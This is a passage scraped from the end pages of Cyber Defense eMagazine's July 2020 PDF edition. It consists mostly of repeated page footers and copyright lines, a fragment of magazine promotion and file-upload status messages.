around the Globe, Faster and More Secure DNS

and CyberDefenseMagazineBackup.com up and running as an array of live

mirror sites.

Millions of monthly readers and new platforms coming…

Cyber Defense eMagazineJuly 2020 Edition 160

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 161

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 162

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 163

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 164

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 165

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 166

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!